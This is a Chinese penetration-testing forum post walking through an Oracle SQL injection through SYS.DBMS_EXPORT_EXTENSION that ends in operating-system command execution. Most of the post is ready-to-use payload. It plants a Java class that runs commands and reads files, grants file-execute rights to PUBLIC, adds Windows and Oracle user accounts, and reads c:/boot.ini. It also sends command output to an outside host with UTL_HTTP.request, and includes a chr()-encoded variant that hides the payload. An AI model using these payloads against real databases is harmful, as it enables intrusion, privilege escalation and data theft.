找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
返回列表 发新帖
查看: 2997|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
* E  J; @4 v" {& n! w' g; x/ X
7 G& S- Y' V; i* t; c3 G  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 7 m) `% L8 Q  K' d* P1 K2 r
的形式即可。(用" 'a'|| "是为了让语句返回true值)
7 D0 A  Q+ Y: q4 r: U语句有点长,可能要用post提交。
9 [" {/ v, p2 w) P% e0 F; e' T以下是各个步骤:
7 T" T* {6 e4 ^* W6 U1.创建包
6 t; H' ^& P) G通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
) \/ X9 l+ T" }$ g( X( a/xxx.jsp?id=1 and '1'<>'a'||( 1 K  D$ D/ }$ a+ v6 q; c7 V. e4 Y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''; k- L; e0 B0 O: y' a
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(% v0 t, `+ G) T- }0 G0 n8 o: {
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}# s$ f# ?' {( _2 d1 m$ o2 [
}'''';END;'';END;--','SYS',0,'1',0) from dual
: L. y& z- i2 L  e)
3 ^- Z$ @+ K& [: S1 s4 l& f------------------------
, K* w0 x% T" a! b! P如果url有长度限制,可以把readFile()函数块去掉,即:
8 p9 q0 w+ r9 F+ D, {/xxx.jsp?id=1 and '1'<>'a'||(
1 w& ~3 [2 D  ^! {* m4 ~0 Kselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
+ |5 H' o7 }1 h7 C1 u. [create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
1 l- S" Y+ J% P; h. x" H0 I$ f% Y7 ?. Knew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}( }# U0 f$ z1 i% }6 s& r
}'''';END;'';END;--','SYS',0,'1',0) from dual + |4 f' ?& q8 _/ T
)   J- E: w+ I  i; e9 f" a
同时把后面步骤 提到的 对readFile()的处理语句去掉。
) y, f( s  s6 ^; S1 N, j8 i------------------------------ 5 P/ u) u, u% K4 q+ I! ~5 @' u9 y
2.赋Java权限 + F: o3 I- z# k/ J
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual3 h4 s  Y" {3 `9 Z3 O$ g1 V: s+ }2 j
3.创建函数
, M3 c8 g, i% C. iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
3 \4 Z' o  f5 b- U8 v, jcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual5 k3 T- [2 B' s0 k2 N+ p
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ K1 K. u( Y, o* Q$ X' hcreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
7 p" `9 v* ~6 d6 \- O4.赋public执行函数的权限 $ Y; a' \/ N/ n$ \. X
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
* R6 t+ Y+ W" uselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual1 @6 K/ s" e0 h6 \: J& d, y$ |
5.测试上面的几步是否成功   t* X9 V! V5 Y* T( N/ d& q
and '1'<>'11'||( & V  E; s. {7 v- H% ?
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
2 [0 C3 A" W. }5 @: j) $ e2 p- j  }  D' l- g+ D  ^  @1 v
and '1'<>(
" }* O; R" |; }9 p  \" `select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE' 1 \% j+ X# R0 R: z
) 3 y% W2 l7 ~5 ~' O- }6 s
6.执行命令: , j# U+ M& k( h$ _
/xxx.jsp?id=1 and '1'<>( 5 d9 b: Y% m9 Q9 t
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual % O. z- f- L- G, b) `5 R$ @  o

, ?0 t$ ^. q) D; ^/ Y  i) l" S8 G)
7 A) T% U- b  Z/xxx.jsp?id=1 and '1'<>(
- ]1 L% X1 ]' n0 d0 Zselect  sys.LinxReadFile('c:/boot.ini') from dual9 {. d; z) S$ d; y6 p5 R

6 a, k8 d7 n% f" s! j)
0 B$ `. M" }% A2 ?  j  : X+ p* D/ X) E- l
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 1 [7 |9 R& k( ]% h
如果要查看运行结果可以用 union :
/ Y( X: H  ]$ Z3 Y/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual5 j3 R: b& g! W9 `8 ?
或者UTL_HTTP.request(: ' P6 ^; k( j; }( d- r7 j; E6 Q2 q
/xxx.jsp?id=1 and '1'<>(
1 M) I) I# @5 @SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
7 e' N& d& n0 z: {6 h4 \0 ^. n) . E7 M; |- [; o( }( w# w
/xxx.jsp?id=1 and '1'<>( : |0 p/ W. a6 J3 L* z5 l
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual4 s7 h! p3 j  l( n  u* E
) ) h; }, q6 I1 v
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。2 ^) x: w  Y- n6 q$ E$ m1 R' D
--------------------
" r) f" @9 p0 g6.内部变化 # X, p6 t& e3 h9 z6 \4 k
通过以下命令可以查看all_objects表达改变: 2 ?9 V6 A3 F9 g- _
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
- y) r% C6 C3 _+ ~7.删除我们创建的函数 % l, z" e7 z$ H) R% E/ z
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
: Z( L$ q" m, m' _$ R9 @drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
: ]7 E. Y& }, l! k==================================================== ! f1 x3 [4 I' p6 ^, ?
全文结束。谨以此文赠与我的朋友。 3 o9 r' l+ }# ^' F
linx
+ [! z+ b" `& r: z/ |124829445
: _+ {* m7 y5 D' V; d2008.1.12
/ I) A' B1 P( f5 k2 dlinyujian@bjfu.edu.cn
% i5 j2 E( \+ e7 V' b2 n====================================================================== * Q( B# n" x" i2 s
测试漏洞的另一方法:
) d9 C' G# R$ h8 F2 y创建oracle帐号:
5 r3 ]/ `8 _, J! C/ ?" [' I+ sselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''', X- ?4 u# L- t( E3 [
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual8 D  P3 Q# k% @+ U: ?% g! r2 a
即: 2 ], L4 i+ x( [$ h
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),# ~( v( P( c/ g, |- l' B
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual   @5 P0 X7 O2 }8 j
确定漏洞存在: / [5 k" x" O; [3 y* u
1<>(   p1 D8 n+ Q* n
select user_id from all_users where username='LINXSQL' 7 B& ?" Z, W. h3 ?. w$ W8 w5 r
)   f! S% L2 D- s. B  }
给linxsql连接权限:
$ b" D0 J5 u5 z  W! V4 rselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. t% u1 q$ u, hGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
$ q+ l: @, y* m$ M4 |" s1 l删除帐号: # N% e7 h5 S6 S, u
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
) L$ h% K8 K! |- }drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
0 f/ }( J- f- ?) a====================== % W& x" Y# q6 r
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
* p1 }" H# ~6 c0 h1.jsp?id=1 and '1'<>(
$ Z" M3 f0 _) P7 }select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''# o, a$ f+ M+ Y& P, Q. I5 C
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual. {! a0 E+ k; X) m
) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
, H% i: I9 T5 i5 R6 k )
! m  k- i, h& x3 d2 a
2 D2 k1 A2 \' c. D& c; f$ L! U8 `4 i/ v% T+ ^. [2 B
' l  X7 X$ j  x
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表